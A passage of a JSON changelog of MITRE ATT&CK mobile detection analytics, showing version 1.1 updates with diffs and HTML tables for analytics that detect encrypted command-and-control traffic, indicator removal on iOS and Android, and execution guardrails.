                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between background execution and network transmission\"}, {\"field\": \"EntropyThreshold\", \"description\": \"Threshold for detecting encrypted payloads\"}, {\"field\": \"BeaconIntervalVariance\", \"description\": \"Tolerance for periodic encrypted communication\"}, {\"field\": \"AllowedAppList\", \"description\": \"Apps expected to exhibit encrypted communication patterns\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-01 16:04:16.642000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Indirect evidence of symmetric cryptographic channel usage inferred through repeated structured encrypted network transmissions and background processing patterns, where direct observation of symmetric crypto operations is limited. Detection correlates application background execution + consistent encrypted payload patterns + app entitlement posture to identify misuse of symmetric encryption for command and control.\", \"old_value\": \"Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to145__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to145__0\"><a href=\"#difflib_chg_to145__top\">t</a></td><td class=\"diff_header\" id=\"from145_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Since&nbsp;data&nbsp;encryption&nbsp;is&nbsp;a&nbsp;common&nbsp;practice&nbsp;in&nbsp;many&nbsp;legitimat</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to145__top\">t</a></td><td class=\"diff_header\" id=\"to145_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Indirect&nbsp;evidence&nbsp;of&nbsp;symmetric&nbsp;cryptographic&nbsp;channel&nbsp;usage&nbsp;i</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;applications&nbsp;and&nbsp;uses&nbsp;standard&nbsp;programming&nbsp;language-specif</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nferred&nbsp;through&nbsp;repeated&nbsp;structured&nbsp;encrypted&nbsp;network&nbsp;transm</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ic&nbsp;APIs,&nbsp;encrypting&nbsp;data&nbsp;for&nbsp;command&nbsp;and&nbsp;control&nbsp;communicati</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">issions&nbsp;and&nbsp;background&nbsp;processing&nbsp;patterns,&nbsp;where&nbsp;direct&nbsp;obs</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">on&nbsp;is&nbsp;regarded&nbsp;as&nbsp;undetectable&nbsp;to&nbsp;the&nbsp;user.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ervation&nbsp;of&nbsp;symmetric&nbsp;crypto&nbsp;operations&nbsp;is&nbsp;limited.&nbsp;Detectio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;correlates&nbsp;application&nbsp;background&nbsp;execution&nbsp;+&nbsp;consistent&nbsp;e</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ncrypted&nbsp;payload&nbsp;patterns&nbsp;+&nbsp;app&nbsp;entitlement&nbsp;posture&nbsp;to&nbsp;ident</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ify&nbsp;misuse&nbsp;of&nbsp;symmetric&nbsp;encryption&nbsp;for&nbsp;command&nbsp;and&nbsp;control.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--50e52979-5f21-4a02-99f3-fc1858b73369",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-24 20:30:22.993000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0651#AN1733",
                            "external_id": "AN1733"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1733",
                    "description": "Detects indirect evidence of host-side indicator removal by correlating (1) local artifact creation or compromise-state-relevant activity, (2) later disappearance, alteration, or reporting loss for those artifacts or state indicators, and (3) continued application or device activity under reduced visibility. Because iOS provides weaker direct visibility into some Android-style artifact and jailbreak-indicator manipulation patterns, the defender relies more on app-private artifact lifecycle changes, managed posture shifts, and continued runtime or network activity after expected evidence disappears.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "Application Vetting",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
                            "name": "User Interface",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between artifact disappearance, posture change, and continued activity"
                        },
                        {
                            "field": "ArtifactTypeSet",
                            "description": "Host artifacts and state indicators monitored for suspicious removal, alteration, or disappearance"
                        },
                        {
                            "field": "ExpectedTelemetrySources",
                            "description": "Baseline sources expected to continue exposing artifact presence or compromise-relevant state"
                        },
                        {
                            "field": "TelemetryGapThreshold",
                            "description": "Threshold defining abnormal loss of artifact visibility or managed-state continuity"
                        },
                        {
                            "field": "ExpectedManagementChanges",
                            "description": "Known legitimate posture or inventory changes that may remove or update artifacts"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Outbound traffic threshold used to confirm meaningful continued activity after indicator removal"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between artifact disappearance, posture change, and continued activity\"}, {\"field\": \"ArtifactTypeSet\", \"description\": \"Host artifacts and state indicators monitored for suspicious removal, alteration, or disappearance\"}, {\"field\": \"ExpectedTelemetrySources\", \"description\": \"Baseline sources expected to continue exposing artifact presence or compromise-relevant state\"}, {\"field\": \"TelemetryGapThreshold\", \"description\": \"Threshold defining abnormal loss of artifact visibility or managed-state continuity\"}, {\"field\": \"ExpectedManagementChanges\", \"description\": \"Known legitimate posture or inventory changes that may remove or update artifacts\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Outbound traffic threshold used to confirm meaningful continued activity after indicator removal\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 20:30:22.993000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Detects indirect evidence of host-side indicator removal by correlating (1) local artifact creation or compromise-state-relevant activity, (2) later disappearance, alteration, or reporting loss for those artifacts or state indicators, and (3) continued application or device activity under reduced visibility. Because iOS provides weaker direct visibility into some Android-style artifact and jailbreak-indicator manipulation patterns, the defender relies more on app-private artifact lifecycle changes, managed posture shifts, and continued runtime or network activity after expected evidence disappears.\", \"old_value\": \"Mobile security products can detect which applications can request device administrator permissions. Application vetting services could look for use of APIs that could indicate the application is trying to hide activity.\\nThe user can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing. The user can see a list of applications that can use accessibility services in the device settings. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Mobile security products can detect which applications can request device administrator permissions. Application vetting services could look for use of APIs that could indicate the application is trying to hide activity.\\n-The user can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing. The user can see a list of applications that can use accessibility services in the device settings. \\n+Detects indirect evidence of host-side indicator removal by correlating (1) local artifact creation or compromise-state-relevant activity, (2) later disappearance, alteration, or reporting loss for those artifacts or state indicators, and (3) continued application or device activity under reduced visibility. Because iOS provides weaker direct visibility into some Android-style artifact and jailbreak-indicator manipulation patterns, the defender relies more on app-private artifact lifecycle changes, managed posture shifts, and continued runtime or network activity after expected evidence disappears.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to167__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to167__0\"><a href=\"#difflib_chg_to167__top\">t</a></td><td class=\"diff_header\" id=\"from167_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;security&nbsp;products&nbsp;can&nbsp;detect&nbsp;which&nbsp;applications&nbsp;can&nbsp;r</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to167__top\">t</a></td><td class=\"diff_header\" id=\"to167_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Detects&nbsp;indirect&nbsp;evidence&nbsp;of&nbsp;host-side&nbsp;indicator&nbsp;removal&nbsp;by&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">equest&nbsp;device&nbsp;administrator&nbsp;permissions.&nbsp;Application&nbsp;vetting</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">correlating&nbsp;(1)&nbsp;local&nbsp;artifact&nbsp;creation&nbsp;or&nbsp;compromise-state-</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;use&nbsp;of&nbsp;APIs&nbsp;that&nbsp;could&nbsp;indicate&nbsp;the</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">relevant&nbsp;activity,&nbsp;(2)&nbsp;later&nbsp;disappearance,&nbsp;alteration,&nbsp;or&nbsp;r</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;application&nbsp;is&nbsp;trying&nbsp;to&nbsp;hide&nbsp;activity.&nbsp;The&nbsp;user&nbsp;can&nbsp;view&nbsp;a</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">eporting&nbsp;loss&nbsp;for&nbsp;those&nbsp;artifacts&nbsp;or&nbsp;state&nbsp;indicators,&nbsp;and&nbsp;(</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">pplications&nbsp;with&nbsp;administrator&nbsp;access&nbsp;through&nbsp;the&nbsp;device&nbsp;set</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">3)&nbsp;continued&nbsp;application&nbsp;or&nbsp;device&nbsp;activity&nbsp;under&nbsp;reduced&nbsp;vi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tings,&nbsp;and&nbsp;may&nbsp;also&nbsp;notice&nbsp;if&nbsp;user&nbsp;data&nbsp;is&nbsp;inexplicably&nbsp;miss</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">sibility.&nbsp;Because&nbsp;iOS&nbsp;provides&nbsp;weaker&nbsp;direct&nbsp;visibility&nbsp;into</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ing.&nbsp;The&nbsp;user&nbsp;can&nbsp;see&nbsp;a&nbsp;list&nbsp;of&nbsp;applications&nbsp;that&nbsp;can&nbsp;use&nbsp;ac</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;some&nbsp;Android-style&nbsp;artifact&nbsp;and&nbsp;jailbreak-indicator&nbsp;manipul</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">cessibility&nbsp;services&nbsp;in&nbsp;the&nbsp;device&nbsp;settings.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ation&nbsp;patterns,&nbsp;the&nbsp;defender&nbsp;relies&nbsp;more&nbsp;on&nbsp;app-private&nbsp;arti</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">fact&nbsp;lifecycle&nbsp;changes,&nbsp;managed&nbsp;posture&nbsp;shifts,&nbsp;and&nbsp;continue</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;runtime&nbsp;or&nbsp;network&nbsp;activity&nbsp;after&nbsp;expected&nbsp;evidence&nbsp;disapp</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ears.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--4773bc29-5272-45d5-92bd-b24a34b16df6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-24 20:30:21.803000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0651#AN1734",
                            "external_id": "AN1734"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1734",
                    "description": "Correlates (1) application activity that creates, modifies, or accesses local artifacts relevant to detection or device compromise state, (2) subsequent deletion, alteration, renaming, relocation, or visibility suppression of those artifacts, including files, application presence, media, or root-compromise indicators, and (3) continued application execution, reduced telemetry quality, or outbound activity after the artifact state changes. The defender observes a causal chain where host-side evidence is first manipulated and expected visibility or reporting degrades while the initiating application remains active.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "device posture or compromise-state indicators change unexpectedly, including rooted or non-compliant status disappearance, after prior app or system activity suggesting persistence on device"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "managed application state changes unexpectedly through uninstall, disappearance from expected inventory, or install-state mismatch after prior suspicious activity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes package, settings, or privileged framework operations capable of disabling security software, altering security enforcement, or interfering with reporting before telemetry loss"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between artifact change, visibility degradation, and continued execution or network activity"
                        },
                        {
                            "field": "ArtifactTypeSet",
                            "description": "Types of host artifacts monitored for suspicious removal or alteration, such as files, installed-app presence, hidden media, or compromise markers"
                        },
                        {
                            "field": "ExpectedTelemetrySources",
                            "description": "Baseline sources expected to continue reflecting artifacts or compromise state"
                        },
                        {
                            "field": "TelemetryGapThreshold",
                            "description": "Threshold defining abnormal loss of artifact visibility or reporting continuity"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Legitimate apps expected to delete or alter artifacts as part of normal lifecycle or cleanup behavior"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Outbound traffic threshold used to confirm meaningful activity after indicator removal"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between artifact change, visibility degradation, and continued execution or network activity\"}, {\"field\": \"ArtifactTypeSet\", \"description\": \"Types of host artifacts monitored for suspicious removal or alteration, such as files, installed-app presence, hidden media, or compromise markers\"}, {\"field\": \"ExpectedTelemetrySources\", \"description\": \"Baseline sources expected to continue reflecting artifacts or compromise state\"}, {\"field\": \"TelemetryGapThreshold\", \"description\": \"Threshold defining abnormal loss of artifact visibility or reporting continuity\"}, {\"field\": \"AllowedAppList\", \"description\": \"Legitimate apps expected to delete or alter artifacts as part of normal lifecycle or cleanup behavior\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Outbound traffic threshold used to confirm meaningful activity after indicator removal\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 20:30:21.803000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) application activity that creates, modifies, or accesses local artifacts relevant to detection or device compromise state, (2) subsequent deletion, alteration, renaming, relocation, or visibility suppression of those artifacts, including files, application presence, media, or root-compromise indicators, and (3) continued application execution, reduced telemetry quality, or outbound activity after the artifact state changes. The defender observes a causal chain where host-side evidence is first manipulated and expected visibility or reporting degrades while the initiating application remains active.\", \"old_value\": \"Mobile security products can detect which applications can request device administrator permissions. Application vetting services could look for use of APIs that could indicate the application is trying to hide activity.\\nThe user can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing. The user can see a list of applications that can use accessibility services in the device settings. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Mobile security products can detect which applications can request device administrator permissions. Application vetting services could look for use of APIs that could indicate the application is trying to hide activity.\\n-The user can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing. The user can see a list of applications that can use accessibility services in the device settings. \\n+Correlates (1) application activity that creates, modifies, or accesses local artifacts relevant to detection or device compromise state, (2) subsequent deletion, alteration, renaming, relocation, or visibility suppression of those artifacts, including files, application presence, media, or root-compromise indicators, and (3) continued application execution, reduced telemetry quality, or outbound activity after the artifact state changes. The defender observes a causal chain where host-side evidence is first manipulated and expected visibility or reporting degrades while the initiating application remains active.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"device posture or compromise-state indicators change unexpectedly, including rooted or non-compliant status disappearance, after prior app or system activity suggesting persistence on device\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"managed application state changes unexpectedly through uninstall, disappearance from expected inventory, or install-state mismatch after prior suspicious activity\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes package, settings, or privileged framework operations capable of disabling security software, altering security enforcement, or interfering with reporting before telemetry loss\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to171__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to171__0\"><a href=\"#difflib_chg_to171__top\">t</a></td><td class=\"diff_header\" id=\"from171_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;security&nbsp;products&nbsp;can&nbsp;detect&nbsp;which&nbsp;applications&nbsp;can&nbsp;r</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to171__top\">t</a></td><td class=\"diff_header\" id=\"to171_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;application&nbsp;activity&nbsp;that&nbsp;creates,&nbsp;modifies,&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">equest&nbsp;device&nbsp;administrator&nbsp;permissions.&nbsp;Application&nbsp;vetting</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">or&nbsp;accesses&nbsp;local&nbsp;artifacts&nbsp;relevant&nbsp;to&nbsp;detection&nbsp;or&nbsp;device&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;use&nbsp;of&nbsp;APIs&nbsp;that&nbsp;could&nbsp;indicate&nbsp;the</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">compromise&nbsp;state,&nbsp;(2)&nbsp;subsequent&nbsp;deletion,&nbsp;alteration,&nbsp;renam</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;application&nbsp;is&nbsp;trying&nbsp;to&nbsp;hide&nbsp;activity.&nbsp;The&nbsp;user&nbsp;can&nbsp;view&nbsp;a</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ing,&nbsp;relocation,&nbsp;or&nbsp;visibility&nbsp;suppression&nbsp;of&nbsp;those&nbsp;artifact</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">pplications&nbsp;with&nbsp;administrator&nbsp;access&nbsp;through&nbsp;the&nbsp;device&nbsp;set</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s,&nbsp;including&nbsp;files,&nbsp;application&nbsp;presence,&nbsp;media,&nbsp;or&nbsp;root-com</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tings,&nbsp;and&nbsp;may&nbsp;also&nbsp;notice&nbsp;if&nbsp;user&nbsp;data&nbsp;is&nbsp;inexplicably&nbsp;miss</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">promise&nbsp;indicators,&nbsp;and&nbsp;(3)&nbsp;continued&nbsp;application&nbsp;execution,</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ing.&nbsp;The&nbsp;user&nbsp;can&nbsp;see&nbsp;a&nbsp;list&nbsp;of&nbsp;applications&nbsp;that&nbsp;can&nbsp;use&nbsp;ac</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;reduced&nbsp;telemetry&nbsp;quality,&nbsp;or&nbsp;outbound&nbsp;activity&nbsp;after&nbsp;the&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">cessibility&nbsp;services&nbsp;in&nbsp;the&nbsp;device&nbsp;settings.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rtifact&nbsp;state&nbsp;changes.&nbsp;The&nbsp;defender&nbsp;observes&nbsp;a&nbsp;causal&nbsp;chain&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">where&nbsp;host-side&nbsp;evidence&nbsp;is&nbsp;first&nbsp;manipulated&nbsp;and&nbsp;expected&nbsp;v</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">isibility&nbsp;or&nbsp;reporting&nbsp;degrades&nbsp;while&nbsp;the&nbsp;initiating&nbsp;applica</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tion&nbsp;remains&nbsp;active.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--31d95dc7-aec7-47a2-bbb4-8b20ca3bc184",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-13 18:45:30.914000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0653#AN1737",
                            "external_id": "AN1737"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1737",
                    "description": "Correlates (1) application access to device- or environment-specific attributes used to validate target conditions, (2) suppression of sensitive behavior until those attributes match an expected value, and (3) immediate transition into protected actions such as sensor use, file access, or network communication only after the condition is satisfied. The defender observes a causal chain where an app repeatedly evaluates device state or environment context and withholds execution until a target-specific match occurs.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
